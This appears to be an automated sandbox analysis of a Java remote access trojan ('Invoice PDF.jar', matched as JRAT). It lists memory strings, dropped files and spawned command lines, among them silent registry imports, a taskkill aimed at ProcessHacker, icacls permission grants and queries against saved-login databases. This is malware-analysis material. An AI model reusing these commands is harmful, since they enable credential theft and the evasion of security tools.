          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema#8
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schemaren
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlere
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/locale
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/localeJ
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/localeoJ
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/s/dom/iD
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces&
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/features/validation
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/(
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/c
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/e
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
          Source: javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmpString found in binary or memory: https://github.com/xerial/sqlite-jdbc
          Source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: https://jrat.io
          Source: java.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmpString found in binary or memory: https://jrat.ioS
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592945279.0000000009E32000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
          Source: javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0

System Summary:

Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\jhxromh.txt, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Uses regedit.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Windows\SysWOW64\test.txt
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_2_02D638EB
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 2_2_02D5ED57
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Code function: 10_3_15362A40
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\jhxromh.txt, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJAR@133/260@0/3
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\bgddtomvyl.js
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4272:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Windows\SysWOW64\icacls.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: javaw.exe, 00000009.00000002.590526543.0000000004C5F000.00000004.00000001.sdmp Binary or memory string: SELECT * FROM wow_logins;
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: javaw.exe, 00000009.00000002.590526543.0000000004C5F000.00000004.00000001.sdmp Binary or memory string: SELECT * FROM LOGINS;
Source: javaw.exe, 00000009.00000002.594264473.000000000A597000.00000004.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Invoice PDF.jar Virustotal: Detection: 11%
Source: javaw.exe String found in binary or memory: -addDropTarget
Source: java.exe String found in binary or memory: mB/LoadStoreParameter
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: unknown unknown (entry repeated 32 times)
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: unknown unknown (entry repeated 25 times)
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: unknown unknown (entry repeated 8 times)
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe Process created: unknown unknown (entry repeated 15 times)
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
          Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb | source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590464923.0000000004881000.00000004.00000001.sdmp
          Source: Binary string: b.pxb.ppb.phb.pXb.pDb.p8b.p,b.p | source: javaw.exe, 00000009.00000002.602797426.00000000702E9000.00000004.00020000.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb | source: javaw.exe, 00000009.00000002.592935649.000000000A16B000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y | source: javaw.exe, 00000009.00000002.602787359.00000000702E6000.00000002.00020000.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBB377 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBBB27 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBA1CA push ecx; ret
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBA1DB push ecx; ret
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBB907 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CBC437 push 00000000h; mov dword ptr [esp], esp
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CC2D44 push eax; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02D60315 push cs; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02D59891 push cs; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 9_3_1572CF33 push eax; iretd
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 9_3_14F5DC8C push E814F5CAh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 9_3_14F5BE7C push E814F5CAh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 9_3_14F65459 push ds; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 9_3_14F5CB1B push E814F5CDh; retf
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 10_3_1529CB0C pushad ; retf
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
          Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
